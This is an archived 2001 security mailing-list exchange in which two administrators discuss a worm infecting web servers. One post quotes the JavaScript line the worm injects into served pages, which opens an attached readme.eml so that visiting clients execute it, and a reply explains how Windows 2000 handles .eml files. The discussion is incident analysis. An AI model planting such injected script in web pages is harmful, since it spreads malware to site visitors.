.eml is listed in the Registry as "Microsoft Internet Mail Message"
with Content Type = "message/rfc822". On my Windows 2000 system this
will result in a program called
\WINDOWS\system32\thumbvw.exe
being executed using the Apartment threading model.
- Jeff
> When pages are served up by an infected server, it looks as though
> readme.eml is 'attached' to them. The server attempts to get the client to
> open them through the following bit of code (from the .dll file):
>
> <script language="JavaScript">window.open("readme.eml", null,
> "resizable=no,top=6000,left=6000")</script>
>
> According to Slashdot, this causes the file to be automatically opened and
> executed by the client. I haven't been able to confirm or deny that (but if
> someone can, please do).
>
> Regards,
> Matt
>
>
> --
> Matt Davis, MCP
> Intermediate Client Server Business Support Analyst
> COUNTRY(SM) Insurance & Financial Services
> 309-821-6288
> mailto:matt.davisat_private
>
Jeffrey Altman * Sr.Software Designer C-Kermit 8.0 Beta available
The Kermit Project @ Columbia University includes Secure Telnet and FTP
http://www.kermit-project.org/ using Kerberos, SRP, and
kermit-support@kermit-project.org OpenSSL. SSH soon to follow.
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 18:15:49 PDT